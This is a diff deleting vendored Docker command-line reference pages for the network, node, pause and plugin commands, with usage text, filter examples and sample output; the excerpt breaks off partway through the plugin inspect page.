"Options": { - "com.docker.network.bridge.default_bridge": "true", - "com.docker.network.bridge.enable_icc": "true", - "com.docker.network.bridge.enable_ip_masquerade": "true", - "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", - "com.docker.network.bridge.name": "docker0", - "com.docker.network.driver.mtu": "1500" - }, - "Labels": {} - } -] -``` - -Returns the information about the user-defined network: - -```bash -$ docker network create simple-network -69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a -$ docker network inspect simple-network -[ - { - "Name": "simple-network", - "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", - "Created": "2016-10-19T04:33:30.360899459Z", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.22.0.0/16", - "Gateway": "172.22.0.1" - } - ] - }, - "Containers": {}, - "Options": {}, - "Labels": {} - } -] -``` - -For swarm mode overlay networks `network inspect` also shows the IP address and node name -of the peers. Peers are the nodes in the swarm cluster which have at least one task attached -to the network. Node name is of the format `-`. - -```bash -$ docker network inspect ingress -[ - { - "Name": "ingress", - "Id": "j0izitrut30h975vk4m1u5kk3", - "Created": "2016-11-08T06:49:59.803387552Z", - "Scope": "swarm", - "Driver": "overlay", - "EnableIPv6": false, - "IPAM": { - "Driver": "default", - "Options": null, - "Config": [ - { - "Subnet": "10.255.0.0/16", - "Gateway": "10.255.0.1" - } - ] - }, - "Internal": false, - "Attachable": false, - "Containers": { - "ingress-sbox": { - "Name": "ingress-endpoint", - "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115", - "MacAddress": "02:42:0a:ff:00:03", - "IPv4Address": "10.255.0.3/16", - "IPv6Address": "" - } - }, - "Options": { - "com.docker.network.driver.overlay.vxlanid_list": "256" - }, - "Labels": {}, - "Peers": [ - { - "Name": "net-1-1d22adfe4d5c", - "IP": "192.168.33.11" - }, - { - "Name": "net-2-d55d838b34af", - "IP": "192.168.33.12" - }, - { - "Name": "net-3-8473f8140bd9", - "IP": "192.168.33.13" - } - ] - } -] -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md deleted file mode 100644 index a4f671d569..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md +++ /dev/null @@ -1,218 +0,0 @@ ---- -title: "network ls" -description: "The network ls command description and usage" -keywords: "network, list, user-defined" ---- - - - -# docker network ls - -```markdown -Usage: docker network ls [OPTIONS] - -List networks - -Aliases: - ls, list - -Options: - -f, --filter filter Provide filter values (e.g. 'driver=bridge') - --format string Pretty-print networks using a Go template - --help Print usage - --no-trunc Do not truncate the output - -q, --quiet Only display network IDs -``` - -Lists all the networks the Engine `daemon` knows about. This includes the -networks that span across multiple hosts in a cluster, for example: - -```bash -$ sudo docker network ls -NETWORK ID NAME DRIVER SCOPE -7fca4eb8c647 bridge bridge local -9f904ee27bf5 none null local -cf03ee007fb4 host host local -78b03ee04fc4 multi-host overlay swarm -``` - -Use the `--no-trunc` option to display the full network id: - -```bash -$ docker network ls --no-trunc -NETWORK ID NAME DRIVER SCOPE -18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null local -c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host local -7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge local -95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge local -63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge local -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. - -The currently supported filters are: - -* driver -* id (network's id) -* label (`label=` or `label==`) -* name (network's name) -* type (custom|builtin) - -#### Driver - -The `driver` filter matches networks based on their driver. - -The following example matches networks with the `bridge` driver: - -```bash -$ docker network ls --filter driver=bridge -NETWORK ID NAME DRIVER SCOPE -db9db329f835 test1 bridge local -f6e212da9dfd test2 bridge local -``` - -#### ID - -The `id` filter matches on all or part of a network's ID. - -The following filter matches all networks with an ID containing the -`63d1ff1f77b0...` string. - -```bash -$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 -NETWORK ID NAME DRIVER SCOPE -63d1ff1f77b0 dev bridge local -``` - -You can also filter for a substring in an ID as this shows: - -```bash -$ docker network ls --filter id=95e74588f40d -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local - -$ docker network ls --filter id=95e -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -``` - -#### Label - -The `label` filter matches networks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches networks with the `usage` label regardless of its value. - -```bash -$ docker network ls -f "label=usage" -NETWORK ID NAME DRIVER SCOPE -db9db329f835 test1 bridge local -f6e212da9dfd test2 bridge local -``` - -The following filter matches networks with the `usage` label with the `prod` value. - -```bash -$ docker network ls -f "label=usage=prod" -NETWORK ID NAME DRIVER SCOPE -f6e212da9dfd test2 bridge local -``` - -#### Name - -The `name` filter matches on all or part of a network's name. - -The following filter matches all networks with a name containing the `foobar` string. - -```bash -$ docker network ls --filter name=foobar -NETWORK ID NAME DRIVER SCOPE -06e7eef0a170 foobar bridge local -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker network ls --filter name=foo -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -06e7eef0a170 foobar bridge local -``` - -#### Type - -The `type` filter supports two values; `builtin` displays predefined networks -(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. - -The following filter matches all user defined networks: - -```bash -$ docker network ls --filter type=custom -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -63d1ff1f77b0 dev bridge local -``` - -By having this flag it allows for batch cleanup. For example, use this filter -to delete all user defined networks: - -```bash -$ docker network rm `docker network ls --filter type=custom -q` -``` - -A warning will be issued when trying to remove a network that has containers -attached. - -## Formatting - -The formatting options (`--format`) pretty-prints networks output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description -------------|------------------------------------------------------------------------------------------ -`.ID` | Network ID -`.Name` | Network name -`.Driver` | Network driver -`.Scope` | Network scope (local, global) -`.IPv6` | Whether IPv6 is enabled on the network or not. -`.Internal` | Whether the network is internal or not. -`.Labels` | All labels assigned to the network. -`.Label` | Value of a specific label for this network. For example `{{.Label "project.version"}}` - -When using the `--format` option, the `network ls` command will either -output the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. - -The following example uses a template without headers and outputs the -`ID` and `Driver` entries separated by a colon for all networks: - -```bash -$ docker network ls --format "{{.ID}}: {{.Driver}}" -afaaab448eb2: bridge -d1584f8dc718: host -391df270dc66: null -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network inspect](network_inspect.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md deleted file mode 100644 index 5b65465600..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "network prune" -description: "Remove unused networks" -keywords: "network, prune, delete" ---- - -# network prune - -```markdown -Usage: docker network prune [OPTIONS] - -Remove all unused networks - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused networks. Unused networks are those which are not referenced by any containers. - -Example output: - -```bash -$ docker network prune -WARNING! This will remove all networks not used by at least one container. -Are you sure you want to continue? [y/N] y -Deleted Networks: -n1 -n2 -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network inspect](network_inspect.md) -* [network rm](network_rm.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [volume prune](volume_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md deleted file mode 100644 index f06b4c002d..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md +++ /dev/null @@ -1,59 +0,0 @@ ---- -title: "network rm" -description: "the network rm command description and usage" -keywords: "network, rm, user-defined" ---- - - - -# network rm - -```markdown -Usage: docker network rm NETWORK [NETWORK...] - -Remove one or more networks - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes one or more networks by name or identifier. To remove a network, -you must first disconnect any containers connected to it. -To remove the network named 'my-network': - -```bash - $ docker network rm my-network -``` - -To delete multiple networks in a single `docker network rm` command, provide -multiple network names or ids. The following example deletes a network with id -`3695c422697f` and a network named `my-network`: - -```bash - $ docker network rm 3695c422697f my-network -``` - -When you specify multiple networks, the command attempts to delete each in turn. -If the deletion of one network fails, the command continues to the next on the -list and tries to delete that. The command reports success or failure for each -deletion. - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network inspect](network_inspect.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md deleted file mode 100644 index 9a81bb9c04..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -title: "node demote" -description: "The node demote command description and usage" -keywords: "node, demote" ---- - - - -# node demote - -```markdown -Usage: docker node demote NODE [NODE...] - -Demote one or more nodes from manager in the swarm - -Options: - --help Print usage - -``` - -Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm. - - -```bash -$ docker node demote -``` - -## Related information - -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md deleted file mode 100644 index fac688fe40..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md +++ /dev/null @@ -1,137 +0,0 @@ ---- -title: "node inspect" -description: "The node inspect command description and usage" -keywords: "node, inspect" ---- - - - -# node inspect - -```markdown -Usage: docker node inspect [OPTIONS] self|NODE [NODE...] - -Display detailed information on one or more nodes - -Options: - -f, --format string Format the output using the given Go template - --help Print usage - --pretty Print the information in a human friendly format. -``` - -Returns information about a node. By default, this command renders all results -in a JSON array. You can specify an alternate format to execute a -given template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. - -Example output: - - $ docker node inspect swarm-manager - [ - { - "ID": "e216jshn25ckzbvmwlnh5jr3g", - "Version": { - "Index": 10 - }, - "CreatedAt": "2016-06-16T22:52:44.9910662Z", - "UpdatedAt": "2016-06-16T22:52:45.230878043Z", - "Spec": { - "Role": "manager", - "Availability": "active" - }, - "Description": { - "Hostname": "swarm-manager", - "Platform": { - "Architecture": "x86_64", - "OS": "linux" - }, - "Resources": { - "NanoCPUs": 1000000000, - "MemoryBytes": 1039843328 - }, - "Engine": { - "EngineVersion": "1.12.0", - "Plugins": [ - { - "Type": "Volume", - "Name": "local" - }, - { - "Type": "Network", - "Name": "overlay" - }, - { - "Type": "Network", - "Name": "null" - }, - { - "Type": "Network", - "Name": "host" - }, - { - "Type": "Network", - "Name": "bridge" - }, - { - "Type": "Network", - "Name": "overlay" - } - ] - } - }, - "Status": { - "State": "ready", - "Addr": "168.0.32.137" - }, - "ManagerStatus": { - "Leader": true, - "Reachability": "reachable", - "Addr": "168.0.32.137:2377" - } - } - ] - - {% raw %} - $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self - false - {% endraw %} - - $ docker node inspect --pretty self - ID: e216jshn25ckzbvmwlnh5jr3g - Hostname: swarm-manager - Joined at: 2016-06-16 22:52:44.9910662 +0000 utc - Status: - State: Ready - Availability: Active - Address: 172.17.0.2 - Manager Status: - Address: 172.17.0.2:2377 - Raft Status: Reachable - Leader: Yes - Platform: - Operating System: linux - Architecture: x86_64 - Resources: - CPUs: 4 - Memory: 7.704 GiB - Plugins: - Network: overlay, bridge, null, host, overlay - Volume: local - Engine Version: 1.12.0 - -## Related information - -* [node demote](node_demote.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md deleted file mode 100644 index 5f61713c2e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md +++ /dev/null @@ -1,130 +0,0 @@ ---- -title: "node ls" -description: "The node ls command description and usage" -keywords: "node, list" ---- - - - -# node ls - -```markdown -Usage: docker node ls [OPTIONS] - -List nodes in the swarm - -Aliases: - ls, list - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - -```bash -$ docker node ls - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [id](node_ls.md#id) -* [label](node_ls.md#label) -* [membership](node_ls.md#membership) -* [name](node_ls.md#name) -* [role](node_ls.md#role) - -#### ID - -The `id` filter matches all or part of a node's id. - -```bash -$ docker node ls -f id=1 - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -``` - -#### Label - -The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering. - -The following filter matches nodes with the `foo` label regardless of its value. - -```bash -$ docker node ls -f "label=foo" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -``` - -#### Membership - -The `membership` filter matches nodes based on the presence of a `membership` and a value -`accepted` or `pending`. - -The following filter matches nodes with the `membership` of `accepted`. - -```bash -$ docker node ls -f "membership=accepted" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active -``` - -#### Name - -The `name` filter matches on all or part of a node hostname. - -The following filter matches the nodes with a name equal to `swarm-master` string. - -```bash -$ docker node ls -f name=swarm-manager1 - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -#### Role - -The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`. - -The following filter matches nodes with the `manager` role. - -```bash -$ docker node ls -f "role=manager" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md deleted file mode 100644 index 92092a8935..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "node promote" -description: "The node promote command description and usage" -keywords: "node, promote" ---- - - - -# node promote - -```markdown -Usage: docker node promote NODE [NODE...] - -Promote one or more nodes to manager in the swarm - -Options: - --help Print usage -``` - -Promotes a node to manager. This command targets a docker engine that is a manager in the swarm. - - -```bash -$ docker node promote -``` - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md deleted file mode 100644 index 7f07c5ea64..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md +++ /dev/null @@ -1,107 +0,0 @@ ---- -title: "node ps" -description: "The node ps command description and usage" -keywords: node, tasks, ps -aliases: ["/engine/reference/commandline/node_tasks/"] ---- - - - -# node ps - -```markdown -Usage: docker node ps [OPTIONS] [NODE...] - -List tasks running on one or more nodes, defaults to current node. - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output -``` - -Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - - $ docker node ps swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours - redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [name](#name) -* [id](#id) -* [label](#label) -* [desired-state](#desired-state) - -#### name - -The `name` filter matches on all or part of a task's name. - -The following filter matches all tasks with a name containing the `redis` string. - - $ docker node ps -f name=redis swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours - redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -#### id - -The `id` filter matches a task's id. - - $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -#### label - -The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches tasks with the `usage` label regardless of its value. - -```bash -$ docker node ps -f "label=usage" -NAME IMAGE NODE DESIRED STATE CURRENT STATE -redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 10 minutes -redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 9 minutes -``` - - -#### desired-state - -The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. - - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md deleted file mode 100644 index b245d636cc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md +++ /dev/null @@ -1,73 +0,0 @@ ---- -title: "node rm" -description: "The node rm command description and usage" -keywords: "node, remove" ---- - - - -# node rm - -```markdown -Usage: docker node rm [OPTIONS] NODE [NODE...] - -Remove one or more nodes from the swarm - -Aliases: - rm, remove - -Options: - -f, --force Force remove a node from the swarm - --help Print usage -``` - -When run from a manager node, removes the specified nodes from a swarm. - - -Example output: - -```nohighlight -$ docker node rm swarm-node-02 - -Node swarm-node-02 removed from swarm -``` - -Removes the specified nodes from the swarm, but only if the nodes are in the -down state. If you attempt to remove an active node you will receive an error: - -```nohighlight -$ docker node rm swarm-node-03 - -Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not -down and can't be removed -``` - -If you lose access to a worker node or need to shut it down because it has been -compromised or is not behaving as expected, you can use the `--force` option. -This may cause transient errors or interruptions, depending on the type of task -being run on the node. - -```nohighlight -$ docker node rm --force swarm-node-03 - -Node swarm-node-03 removed from swarm -``` - -A manager node must be demoted to a worker node (using `docker node demote`) -before you can remove it from the swarm. - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md deleted file mode 100644 index aa65d0309e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md +++ /dev/null @@ -1,71 +0,0 @@ ---- -title: "node update" -description: "The node update command description and usage" -keywords: "resources, update, dynamically" ---- - - - -## update - -```markdown -Usage: docker node update [OPTIONS] NODE - -Update a node - -Options: - --availability string Availability of the node (active/pause/drain) - --help Print usage - --label-add value Add or update a node label (key=value) (default []) - --label-rm value Remove a node label if exists (default []) - --role string Role of the node (worker/manager) -``` - -### Add label metadata to a node - -Add metadata to a swarm node using node labels. You can specify a node label as -a key with an empty value: - -``` bash -$ docker node update --label-add foo worker1 -``` - -To add multiple labels to a node, pass the `--label-add` flag for each label: - -``` bash -$ docker node update --label-add foo --label-add bar worker1 -``` - -When you [create a service](service_create.md), -you can use node labels as a constraint. A constraint limits the nodes where the -scheduler deploys tasks for a service. - -For example, to add a `type` label to identify nodes where the scheduler should -deploy message queue service tasks: - -``` bash -$ docker node update --label-add type=queue worker1 -``` - -The labels you set for nodes using `docker node update` apply only to the node -entity within the swarm. Do not confuse them with the docker daemon labels for -[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels). - -For more information about labels, refer to [apply custom -metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md deleted file mode 100644 index e2dd800d5f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md +++ /dev/null @@ -1,40 +0,0 @@ ---- -title: "pause" -description: "The pause command description and usage" -keywords: "cgroups, container, suspend, SIGSTOP" ---- - - - -# pause - -```markdown -Usage: docker pause CONTAINER [CONTAINER...] - -Pause all processes within one or more containers - -Options: - --help Print usage -``` - -The `docker pause` command suspends all processes in the specified containers. -On Linux, this uses the cgroups freezer. Traditionally, when suspending a process -the `SIGSTOP` signal is used, which is observable by the process being suspended. -With the cgroups freezer the process is unaware, and unable to capture, -that it is being suspended, and subsequently resumed. On Windows, only Hyper-V -containers can be paused. - -See the -[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) -for further details. - -## Related information - -* [unpause](unpause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md deleted file mode 100644 index 9d4e99e56a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md +++ /dev/null @@ -1,60 +0,0 @@ ---- -title: "plugin create" -description: "the plugin create command description and usage" -keywords: "plugin, create" ---- - - - -# plugin create - -```markdown -Usage: docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR - -Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory. - -Options: - --compress Compress the context using gzip - --help Print usage -``` - -Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as -[the config.json](../../extend/config.md) - - -The following example shows how to create a sample `plugin`. - -```bash - -$ ls -ls /home/pluginDir - -4 -rw-r--r-- 1 root root 431 Nov 7 01:40 config.json -0 drwxr-xr-x 19 root root 420 Nov 7 01:40 rootfs - -$ docker plugin create plugin /home/pluginDir -plugin - -NAME TAG DESCRIPTION ENABLED -plugin latest A sample plugin for Docker true -``` - -The plugin can subsequently be enabled for local use or pushed to the public registry. - -## Related information - -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md deleted file mode 100644 index 451f1ace9c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md +++ /dev/null @@ -1,66 +0,0 @@ ---- -title: "plugin disable" -description: "the plugin disable command description and usage" -keywords: "plugin, disable" ---- - - - -# plugin disable - -```markdown -Usage: docker plugin disable [OPTIONS] PLUGIN - -Disable a plugin - -Options: - -f, --force Force the disable of an active plugin - --help Print usage -``` - -Disables a plugin. The plugin must be installed before it can be disabled, -see [`docker plugin install`](plugin_install.md). Without the `-f` option, -a plugin that has references (eg, volumes, networks) cannot be disabled. - - -The following example shows that the `sample-volume-plugin` plugin is installed -and enabled: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -To disable the plugin, use the following command: - -```bash -$ docker plugin disable tiborvass/sample-volume-plugin - -tiborvass/sample-volume-plugin - -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md deleted file mode 100644 index df8bee3af5..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md +++ /dev/null @@ -1,65 +0,0 @@ ---- -title: "plugin enable" -description: "the plugin enable command description and usage" -keywords: "plugin, enable" ---- - - - -# plugin enable - -```markdown -Usage: docker plugin enable [OPTIONS] PLUGIN - -Enable a plugin - -Options: - --help Print usage - --timeout int HTTP client timeout (in seconds) -``` - -Enables a plugin. The plugin must be installed before it can be enabled, -see [`docker plugin install`](plugin_install.md). - - -The following example shows that the `sample-volume-plugin` plugin is installed, -but disabled: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false -``` - -To enable the plugin, use the following command: - -```bash -$ docker plugin enable tiborvass/sample-volume-plugin - -tiborvass/sample-volume-plugin - -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md deleted file mode 100644 index fdcc030c43..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md +++ /dev/null @@ -1,164 +0,0 @@ ---- -title: "plugin inspect" -description: "The plugin inspect command description and usage" -keywords: "plugin, inspect" ---- - - - -# plugin inspect - -```markdown -Usage: docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...] - -Display detailed information on one or more plugins - -Options: - -f, --format string Format the output using the given Go template - --help Print usage 